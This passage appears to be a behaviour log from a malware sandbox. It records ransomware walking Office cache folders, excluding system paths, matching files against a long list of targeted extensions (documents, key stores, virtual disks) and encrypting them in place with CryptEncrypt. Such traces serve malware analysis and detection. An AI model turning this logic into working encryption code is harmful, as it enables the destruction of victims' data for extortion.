Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.xml" [0025.340] PathFindExtensionW (pszPath="Proof.xml") returned=".xml" [0025.340] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asm.asp.aspx.avhd.back.bak.bmp.brw.c.cab.cc.cer.cfg.conf.cpp.crt.cs.ctl.cxx.dbf.der.dib.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.hpp.hxx.iso.java.jfif.jpe.jpeg.jpg.js.kdbx.key.mail.mdb.msg.nrg.odc.odf.odg.odi.odm.odp.ods.odt.ora.ost.ova.ovf.p12.p7b.p7c.pdf.pem.pfx.php.pmf.png.ppt.pptx.ps1.pst.pvi.py.pyc.pyw.qcow.qcow2.rar.rb.rtf.scm.sln.sql.tar.tib.tif.tiff.vb.vbox.vbs.vcb.vdi.vfd.vhd.vhdx.vmc.vmdk.vmsd.vmtm.vmx.vsdx.vsv.work.xls.xlsx.xml.xvd.zip.", lpSrch=".xml.") returned=".xml.xvd.zip." [0025.340] CryptDuplicateKey (in: hKey=0x37f480, pdwReserved=0x0, dwFlags=0x0, phKey=0x31cd9d4 | out: phKey=0x31cd9d4*=0x368430) returned 1 [0025.340] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.es\\proof.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x230 [0025.340] GetFileSizeEx (in: hFile=0x230, lpFileSize=0x31cd9b8 | out: lpFileSize=0x31cd9b8*=1457) returned 1 [0025.340] CreateFileMappingW (hFile=0x230, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x5e2, lpName=0x0) returned 0x26c [0025.340] GetSystemInfo (in: lpSystemInfo=0x31cd95c | out: lpSystemInfo=0x31cd95c*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0025.340] MapViewOfFile (hFileMappingObject=0x26c, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x5b1) returned 0xa0000 [0025.342] UnmapViewOfFile (lpBaseAddress=0xa0000) returned 1 [0025.343] MapViewOfFile (hFileMappingObject=0x26c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x5b1) returned 0xa0000 [0025.343] CryptEncrypt (in: hKey=0x368430, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xa0000*, pdwDataLen=0x31cd9e8*=0x5b1, dwBufLen=0x5c0 | out: pbData=0xa0000*, pdwDataLen=0x31cd9e8*=0x5c0) returned 1 [0025.343] FlushViewOfFile (lpBaseAddress=0xa0000, dwNumberOfBytesToFlush=0x5c0) returned 1 [0025.345] UnmapViewOfFile (lpBaseAddress=0xa0000) returned 1 [0025.345] GetSystemInfo (in: lpSystemInfo=0x31cd95c | out: lpSystemInfo=0x31cd95c*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0025.346] MapViewOfFile (hFileMappingObject=0x26c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x5e2) returned 0xa0000 [0025.348] CryptDuplicateHash (in: hHash=0x368270, pdwReserved=0x0, dwFlags=0x0, phHash=0x31cd998 | out: phHash=0x31cd998) returned 1 [0025.348] CryptHashData (hHash=0x368470, pbData=0xa05bc, dwDataLen=0x4, dwFlags=0x0) returned 1 [0025.348] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x36ea40 [0025.348] CryptGetHashParam (in: hHash=0x368470, dwParam=0x2, pbData=0x36ea40, pdwDataLen=0x31cd988, dwFlags=0x0 | out: pbData=0x36ea40, pdwDataLen=0x31cd988) returned 1 [0025.348] FlushViewOfFile (lpBaseAddress=0xa0000, dwNumberOfBytesToFlush=0x5e2) returned 1 [0025.348] LocalFree (hMem=0x36ea40) returned 0x0 [0025.348] CryptDestroyHash (hHash=0x368470) returned 1 [0025.348] UnmapViewOfFile (lpBaseAddress=0xa0000) returned 1 [0025.348] CloseHandle (hObject=0x26c) returned 1 [0025.348] CloseHandle (hObject=0x230) returned 1 [0025.349] CryptDestroyKey (hKey=0x368430) returned 1 [0025.349] FindNextFileW (in: hFindFile=0x3683b0, lpFindFileData=0x31cda00 | out: lpFindFileData=0x31cda00) returned 0 [0025.349] FindClose (in: hFindFile=0x3683b0 | out: hFindFile=0x3683b0) returned 1 [0025.349] FindNextFileW (in: hFindFile=0x368370, lpFindFileData=0x31ce088 | out: lpFindFileData=0x31ce088) returned 1 [0025.349] WaitForMultipleObjects (nCount=0x2, lpHandles=0x31b4e0*=0x210, bWaitAll=0, dwMilliseconds=0x0) returned 0x102 [0025.349] PathCombineW (in: pszDest=0x31ce2d8, pszDir="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C", pszFile="Proof.fr" | out: pszDest="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr") returned="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr" [0025.350] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr", lpSrch="\\Windows") returned 0x0 [0025.350] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr", lpSrch="\\Program Files") returned 0x0 [0025.350] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr", lpSrch="\\ProgramData") returned 0x0 [0025.350] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr", lpSrch="\\AppData") returned 0x0 [0025.350] PathCombineW (in: pszDest=0x31cde58, pszDir="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr", pszFile="*" | out: pszDest="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\*") returned="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\*" [0025.350] FindFirstFileW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\*", lpFindFileData=0x31cda00 | out: lpFindFileData=0x31cda00) returned 0x3683b0 [0025.350] WaitForMultipleObjects (nCount=0x2, lpHandles=0x31b4e0*=0x210, bWaitAll=0, dwMilliseconds=0x0) returned 0x102 [0025.350] FindNextFileW (in: hFindFile=0x3683b0, lpFindFileData=0x31cda00 | out: lpFindFileData=0x31cda00) returned 1 [0025.350] WaitForMultipleObjects (nCount=0x2, lpHandles=0x31b4e0*=0x210, bWaitAll=0, dwMilliseconds=0x0) returned 0x102 [0025.350] FindNextFileW (in: hFindFile=0x3683b0, lpFindFileData=0x31cda00 | out: lpFindFileData=0x31cda00) returned 1 [0025.350] WaitForMultipleObjects (nCount=0x2, lpHandles=0x31b4e0*=0x210, bWaitAll=0, dwMilliseconds=0x0) returned 0x102 [0025.350] PathCombineW (in: pszDest=0x31cdc50, pszDir="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr", pszFile="Proof.cab" | out: pszDest="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.cab") returned="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.cab" [0025.350] PathFindExtensionW (pszPath="Proof.cab") returned=".cab" [0025.350] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asm.asp.aspx.avhd.back.bak.bmp.brw.c.cab.cc.cer.cfg.conf.cpp.crt.cs.ctl.cxx.dbf.der.dib.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.hpp.hxx.iso.java.jfif.jpe.jpeg.jpg.js.kdbx.key.mail.mdb.msg.nrg.odc.odf.odg.odi.odm.odp.ods.odt.ora.ost.ova.ovf.p12.p7b.p7c.pdf.pem.pfx.php.pmf.png.ppt.pptx.ps1.pst.pvi.py.pyc.pyw.qcow.qcow2.rar.rb.rtf.scm.sln.sql.tar.tib.tif.tiff.vb.vbox.vbs.vcb.vdi.vfd.vhd.vhdx.vmc.vmdk.vmsd.vmtm.vmx.vsdx.vsv.work.xls.xlsx.xml.xvd.zip.", lpSrch=".cab.") returned=".cab.cc.cer.cfg.conf.cpp.crt.cs.ctl.cxx.dbf.der.dib.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.hpp.hxx.iso.java.jfif.jpe.jpeg.jpg.js.kdbx.key.mail.mdb.msg.nrg.odc.odf.odg.odi.odm.odp.ods.odt.ora.ost.ova.ovf.p12.p7b.p7c.pdf.pem.pfx.php.pmf.png.ppt.pptx.ps1.pst.pvi.py.pyc.pyw.qcow.qcow2.rar.rb.rtf.scm.sln.sql.tar.tib.tif.tiff.vb.vbox.vbs.vcb.vdi.vfd.vhd.vhdx.vmc.vmdk.vmsd.vmtm.vmx.vsdx.vsv.work.xls.xlsx.xml.xvd.zip." [0025.350] CryptDuplicateKey (in: hKey=0x37f480, pdwReserved=0x0, dwFlags=0x0, phKey=0x31cd9d4 | out: phKey=0x31cd9d4*=0x368430) returned 1 [0025.350] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.cab" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.fr\\proof.cab"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x230 [0025.350] GetFileSizeEx (in: hFile=0x230, lpFileSize=0x31cd9b8 | out: lpFileSize=0x31cd9b8*=21064532) returned 1 [0025.350] CreateFileMappingW (hFile=0x230, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x1416b76, lpName=0x0) returned 0x26c [0025.350] GetSystemInfo (in: lpSystemInfo=0x31cd95c | out: lpSystemInfo=0x31cd95c*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0025.351] MapViewOfFile (hFileMappingObject=0x26c, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x1410000, dwNumberOfBytesToMap=0x6b54) returned 0xa0000 [0025.352] UnmapViewOfFile (lpBaseAddress=0xa0000) returned 1 [0025.352] MapViewOfFile (hFileMappingObject=0x26c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1000000) returned 0x3240000 [0025.353] CryptEncrypt (in: hKey=0x368430, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3240000*, pdwDataLen=0x31cd9e8*=0x1000000, dwBufLen=0x1416b54 | out: pbData=0x3240000*, pdwDataLen=0x31cd9e8*=0x1000000) returned 1 [0025.838] FlushViewOfFile (lpBaseAddress=0x3240000, dwNumberOfBytesToFlush=0x1000000) returned 1 [0025.948] UnmapViewOfFile (lpBaseAddress=0x3240000) returned 1 [0025.971] GetSystemInfo (in: lpSystemInfo=0x31cd95c | out: lpSystemInfo=0x31cd95c*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0025.971] MapViewOfFile (hFileMappingObject=0x26c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x1410000, dwNumberOfBytesToMap=0x6b76) returned 0xa0000 [0025.972] CryptDuplicateHash (in: hHash=0x368270, pdwReserved=0x0, dwFlags=0x0, phHash=0x31cd998 | out: phHash=0x31cd998) returned 1 [0025.972] CryptHashData (hHash=0x368470, pbData=0xa6b50, dwDataLen=0x4, dwFlags=0x0) returned 1 [0025.972] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x36ea40 [0025.972] CryptGetHashParam (in: hHash=0x368470, dwParam=0x2, pbData=0x36ea40, pdwDataLen=0x31cd988, dwFlags=0x0 | out: pbData=0x36ea40, pdwDataLen=0x31cd988) returned 1 [0025.972] FlushViewOfFile (lpBaseAddress=0xa0000, dwNumberOfBytesToFlush=0x6b76) returned 1 [0025.974] LocalFree (hMem=0x36ea40) returned 0x0 [0025.974] CryptDestroyHash (hHash=0x368470) returned 1 [0025.974] UnmapViewOfFile (lpBaseAddress=0xa0000) returned 1 [0025.974] CloseHandle (hObject=0x26c) returned 1 [0025.974] CloseHandle (hObject=0x230) returned 1 [0026.166] CryptDestroyKey (hKey=0x368430) returned 1 [0026.166] FindNextFileW (in: hFindFile=0x3683b0, lpFindFileData=0x31cda00 | out: lpFindFileData=0x31cda00) returned 1 [0026.166] WaitForMultipleObjects (nCount=0x2, lpHandles=0x31b4e0*=0x210, bWaitAll=0, dwMilliseconds=0x0) returned 0x102 [0026.166] PathCombineW (in: pszDest=0x31cdc50, pszDir="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr", pszFile="Proof.msi" | out: pszDest="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.msi") returned="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.msi" [0026.166] PathFindExtensionW (pszPath="Proof.msi") returned=".msi" [0026.166] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asm.asp.aspx.avhd.back.bak.bmp.brw.c.cab.cc.cer.cfg.conf.cpp.crt.cs.ctl.cxx.dbf.der.dib.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.hpp.hxx.iso.java.jfif.jpe.jpeg.jpg.js.kdbx.key.mail.mdb.msg.nrg.odc.odf.odg.odi.odm.odp.ods.odt.ora.ost.ova.ovf.p12.p7b.p7c.pdf.pem.pfx.php.pmf.png.ppt.pptx.ps1.pst.pvi.py.pyc.pyw.qcow.qcow2.rar.rb.rtf.scm.sln.sql.tar.tib.tif.tiff.vb.vbox.vbs.vcb.vdi.vfd.vhd.vhdx.vmc.vmdk.vmsd.vmtm.vmx.vsdx.vsv.work.xls.xlsx.xml.xvd.zip.", lpSrch=".msi.") returned 0x0 [0026.166] FindNextFileW (in: hFindFile=0x3683b0, lpFindFileData=0x31cda00 | out: lpFindFileData=0x31cda00) returned 1 [0026.166] WaitForMultipleObjects (nCount=0x2, lpHandles=0x31b4e0*=0x210, bWaitAll=0, dwMilliseconds=0x0) returned 0x102 [0026.166] PathCombineW (in: pszDest=0x31cdc50, pszDir="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr", pszFile="Proof.xml" | out: pszDest="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.xml") returned="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.xml" [0026.166] PathFindExtensionW (pszPath="Proof.xml") returned=".xml" [0026.166] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asm.asp.aspx.avhd.back.bak.bmp.brw.c.cab.cc.cer.cfg.conf.cpp.crt.cs.ctl.cxx.dbf.der.dib.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.hpp.hxx.iso.java.jfif.jpe.jpeg.jpg.js.kdbx.key.mail.mdb.msg.nrg.odc.odf.odg.odi.odm.odp.ods.odt.ora.ost.ova.ovf.p12.p7b.p7c.pdf.pem.pfx.php.pmf.png.ppt.pptx.ps1.pst.pvi.py.pyc.pyw.qcow.qcow2.rar.rb.rtf.scm.sln.sql.tar.tib.tif.tiff.vb.vbox.vbs.vcb.vdi.vfd.vhd.vhdx.vmc.vmdk.vmsd.vmtm.vmx.vsdx.vsv.work.xls.xlsx.xml.xvd.zip.", lpSrch=".xml.") returned=".xml.xvd.zip." [0026.166] CryptDuplicateKey (in: hKey=0x37f480, pdwReserved=0x0, dwFlags=0x0, phKey=0x31cd9d4 | out: phKey=0x31cd9d4*=0x368430) returned 1 [0026.166] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.fr\\proof.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x230 [0026.166] GetFileSizeEx (in: hFile=0x230, lpFileSize=0x31cd9b8 | out: lpFileSize=0x31cd9b8*=1458) returned 1 [0026.166] CreateFileMappingW (hFile=0x230, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x5e2, lpName=0x0) returned 0x26c [0026.166] GetSystemInfo (in: lpSystemInfo=0x31cd95c | out: lpSystemInfo=0x31cd95c*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0026.166] MapViewOfFile (hFileMappingObject=0x26c, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x5b2) returned 0xa0000 [0026.167] UnmapViewOfFile (lpBaseAddress=0xa0000) returned 1 [0026.168] MapViewOfFile (hFileMappingObject=0x26c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x5b2) returned 0xa0000 [0026.169] CryptEncrypt (in: hKey=0x368430, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xa0000*, pdwDataLen=0x31cd9e8*=0x5b2, dwBufLen=0x5c0 | out: pbData=0xa0000*, pdwDataLen=0x31cd9e8*=0x5c0) returned 1 [0026.169] FlushViewOfFile (lpBaseAddress=0xa0000, dwNumberOfBytesToFlush=0x5c0) returned 1 [0026.169] UnmapViewOfFile (lpBaseAddress=0xa0000) returned 1 [0026.170] GetSystemInfo (in: lpSystemInfo=0x31cd95c | out: lpSystemInfo=0x31cd95c*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0026.170] MapViewOfFile (hFileMappingObject=0x26c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x5e2) returned 0xa0000 [0026.170] CryptDuplicateHash (in: hHash=0x368270, pdwReserved=0x0, dwFlags=0x0, phHash=0x31cd998 | out: phHash=0x31cd998) returned 1 [0026.170] CryptHashData (hHash=0x368470, pbData=0xa05bc, dwDataLen=0x4, dwFlags=0x0) returned 1 [0026.170] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x36ea40 [0026.170] CryptGetHashParam (in: hHash=0x368470, dwParam=0x2, pbData=0x36ea40, pdwDataLen=0x31cd988, dwFlags=0x0 | out: pbData=0x36ea40, pdwDataLen=0x31cd988) returned 1 [0026.171] FlushViewOfFile (lpBaseAddress=0xa0000, dwNumberOfBytesToFlush=0x5e2) returned 1 [0026.171] LocalFree (hMem=0x36ea40) returned 0x0 [0026.171] CryptDestroyHash (hHash=0x368470) returned 1 [0026.171] UnmapViewOfFile (lpBaseAddress=0xa0000) returned 1 [0026.171] CloseHandle (hObject=0x26c) returned 1 [0026.171] CloseHandle (hObject=0x230) returned 1 [0026.172] CryptDestroyKey (hKey=0x368430) returned 1 [0026.172] FindNextFileW (in: hFindFile=0x3683b0, lpFindFileData=0x31cda00 | out: lpFindFileData=0x31cda00) returned 0 [0026.172] FindClose (in: hFindFile=0x3683b0 | out: hFindFile=0x3683b0) returned 1 [0026.172] FindNextFileW (in: hFindFile=0x368370, lpFindFileData=0x31ce088 | out: lpFindFileData=0x31ce088) returned 1 [0026.172] WaitForMultipleObjects (nCount=0x2, lpHandles=0x31b4e0*=0x210, bWaitAll=0, dwMilliseconds=0x0) returned 0x102 [0026.172] PathCombineW (in: pszDest=0x31ce2d8, pszDir="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C", pszFile="Proofing.msi" | out: pszDest="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.msi") returned="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.msi" [0026.172] PathFindExtensionW (pszPath="Proofing.msi") returned=".msi" [0026.172] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asm.asp.aspx.avhd.back.bak.bmp.brw.c.cab.cc.cer.cfg.conf.cpp.crt.cs.ctl.cxx.dbf.der.dib.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.hpp.hxx.iso.java.jfif.jpe.jpeg.jpg.js.kdbx.key.mail.mdb.msg.nrg.odc.odf.odg.odi.odm.odp.ods.odt.ora.ost.ova.ovf.p12.p7b.p7c.pdf.pem.pfx.php.pmf.png.ppt.pptx.ps1.pst.pvi.py.pyc.pyw.qcow.qcow2.rar.rb.rtf.scm.sln.sql.tar.tib.tif.tiff.vb.vbox.vbs.vcb.vdi.vfd.vhd.vhdx.vmc.vmdk.vmsd.vmtm.vmx.vsdx.vsv.work.xls.xlsx.xml.xvd.zip.", lpSrch=".msi.") returned 0x0 [0026.172] FindNextFileW (in: hFindFile=0x368370, lpFindFileData=0x31ce088 | out: lpFindFileData=0x31ce088) returned 1 [0026.172] WaitForMultipleObjects (nCount=0x2, lpHandles=0x31b4e0*=0x210, bWaitAll=0, dwMilliseconds=0x0) returned 0x102 [0026.172] PathCombineW (in: pszDest=0x31ce2d8, pszDir="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C", pszFile="Proofing.xml" | out: pszDest="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml") returned="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml" [0026.172] PathFindExtensionW (pszPath="Proofing.xml") returned=".xml" [0026.172] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asm.asp.aspx.avhd.back.bak.bmp.brw.c.cab.cc.cer.cfg.conf.cpp.crt.cs.ctl.cxx.dbf.der.dib.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.hpp.hxx.iso.java.jfif.jpe.jpeg.jpg.js.kdbx.key.mail.mdb.msg.nrg.odc.odf.odg.odi.odm.odp.ods.odt.ora.ost.ova.ovf.p12.p7b.p7c.pdf.pem.pfx.php.pmf.png.ppt.pptx.ps1.pst.pvi.py.pyc.pyw.qcow.qcow2.rar.rb.rtf.scm.sln.sql.tar.tib.tif.tiff.vb.vbox.vbs.vcb.vdi.vfd.vhd.vhdx.vmc.vmdk.vmsd.vmtm.vmx.vsdx.vsv.work.xls.xlsx.xml.xvd.zip.", lpSrch=".xml.") returned=".xml.xvd.zip." [0026.173] CryptDuplicateKey (in: hKey=0x37f480, pdwReserved=0x0, dwFlags=0x0, phKey=0x31ce05c | out: phKey=0x31ce05c*=0x3683b0) returned 1 [0026.173] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proofing.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x22c [0026.173] GetFileSizeEx (in: hFile=0x22c, lpFileSize=0x31ce040 | out: lpFileSize=0x31ce040*=811) returned 1 [0026.173] CreateFileMappingW (hFile=0x22c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x352, lpName=0x0) returned 0x230 [0026.173] GetSystemInfo (in: lpSystemInfo=0x31cdfe4 | out: lpSystemInfo=0x31cdfe4*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0026.173] MapViewOfFile (hFileMappingObject=0x230, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x32b) returned 0xa0000 [0026.174] UnmapViewOfFile (lpBaseAddress=0xa0000) returned 1 [0026.174] MapViewOfFile (hFileMappingObject=0x230, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x32b) returned 0xa0000 [0026.175] CryptEncrypt (in: hKey=0x3683b0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xa0000*, pdwDataLen=0x31ce070*=0x32b, dwBufLen=0x330 | out: pbData=0xa0000*, pdwDataLen=0x31ce070*=0x330) returned 1 [0026.175] FlushViewOfFile (lpBaseAddress=0xa0000, dwNumberOfBytesToFlush=0x330) returned 1 [0026.176] UnmapViewOfFile (lpBaseAddress=0xa0000) returned 1 [0026.176] GetSystemInfo (in: lpSystemInfo=0x31cdfe4 | out: lpSystemInfo=0x31cdfe4*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0026.176] MapViewOfFile (hFileMappingObject=0x230, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x352) returned 0xa0000 [0026.177] CryptDuplicateHash (in: hHash=0x368270, pdwReserved=0x0, dwFlags=0x0, phHash=0x31ce020 | out: phHash=0x31ce020) returned 1 [0026.177] CryptHashData (hHash=0x368430, pbData=0xa032c, dwDataLen=0x4, dwFlags=0x0) returned 1 [0026.177] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x36ea40 [0026.177] CryptGetHashParam (in: hHash=0x368430, dwParam=0x2, pbData=0x36ea40, pdwDataLen=0x31ce010, dwFlags=0x0 | out: pbData=0x36ea40, pdwDataLen=0x31ce010) returned 1 [0026.177] FlushViewOfFile (lpBaseAddress=0xa0000, dwNumberOfBytesToFlush=0x352) returned 1 [0026.177] LocalFree (hMem=0x36ea40) returned 0x0 [0026.177] CryptDestroyHash (hHash=0x368430) returned 1 [0026.177] UnmapViewOfFile (lpBaseAddress=0xa0000) returned 1 [0026.178] CloseHandle (hObject=0x230) returned 1 [0026.178] CloseHandle (hObject=0x22c) returned 1 [0026.178] CryptDestroyKey (hKey=0x3683b0) returned 1 [0026.178] FindNextFileW (in: hFindFile=0x368370, lpFindFileData=0x31ce088 | out: lpFindFileData=0x31ce088) returned 1 [0026.178] WaitForMultipleObjects (nCount=0x2, lpHandles=0x31b4e0*=0x210, bWaitAll=0, dwMilliseconds=0x0) returned 0x102 [0026.178] PathCombineW (in: pszDest=0x31ce2d8, pszDir="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C", pszFile="Setup.xml" | out: pszDest="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml") returned="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml" [0026.178] PathFindExtensionW 